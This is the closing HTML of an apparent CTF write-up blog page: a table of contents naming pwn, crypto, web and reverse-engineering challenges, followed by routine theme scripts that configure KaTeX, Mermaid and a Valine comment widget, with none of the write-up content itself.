          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#pwn"><span class="toc-number">1.</span> <span class="toc-text">pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#tryc"><span class="toc-number">1.1.</span> <span class="toc-text">tryc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-backdoor"><span class="toc-number">1.2.</span> <span class="toc-text">easy_backdoor</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#backdoor2"><span class="toc-number">1.3.</span> <span class="toc-text">backdoor2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2shellcode"><span class="toc-number">1.4.</span> <span class="toc-text">ret2shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#for1"><span class="toc-number">1.5.</span> <span class="toc-text">for1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#for2"><span class="toc-number">1.6.</span> <span class="toc-text">for2</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CRYPTO"><span class="toc-number">2.</span> <span class="toc-text">CRYPTO</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Matryoshka-doll"><span class="toc-number">2.1.</span> <span class="toc-text">Matryoshka doll</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#keyboard"><span class="toc-number">2.2.</span> <span class="toc-text">keyboard</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web"><span class="toc-number">3.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#vue-terminal"><span class="toc-number">3.1.</span> <span class="toc-text">vue-terminal</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-maze"><span class="toc-number">3.2.</span> <span class="toc-text">ez_maze</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#re"><span class="toc-number">4.</span> <span class="toc-text">re</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Find"><span class="toc-number">4.1.</span> <span class="toc-text">Easy_Find</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Replacement"><span class="toc-number">4.2.</span> <span class="toc-text">Replacement</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-Crack"><span class="toc-number">4.3.</span> <span class="toc-text">Easy_Crack</span></a></li></ol></li></ol>
        </div>
      </div>
    </cosy-drag-box>
    
  </div>

</div>

<script>
  window.page = {
    use: ''
  }
  window.katex = {
    enable: "",
    jsCdn: "//cdn.jsdelivr.net/npm/katex@0.13.18/dist/katex.min.js",
    cssCdn: "//cdn.jsdelivr.net/npm/katex@0.13.18/dist/katex.min.css"
  }
  window.mermaid = {
    enable: "",
    theme: "",
    cdn: "//cdn.jsdelivr.net/npm/mermaid@10.4.0/dist/mermaid.min.js",
  }
  window.valine = {
    enable: "",
    appId: '4Q4EAMdq8elmFDwiIj0R0Z80-gzGzoHsz',
    appKey: 'JRv5ulQZAwmbGgfeetCXRvoW',
    avatar: 'monsterid',
    cdn: '//unpkg.com/valine@latest/dist/Valine.min.js',
    serverURLs: ''
  };
</script>


<script src="/js/0af3d6bb.js"></script>

  </main>
</body>

<script>
  window.theme = {
    color: 'hsl(238,50%,56%)'
  }
</script>


<script src="/js/69a216b6.js"></script>


</html>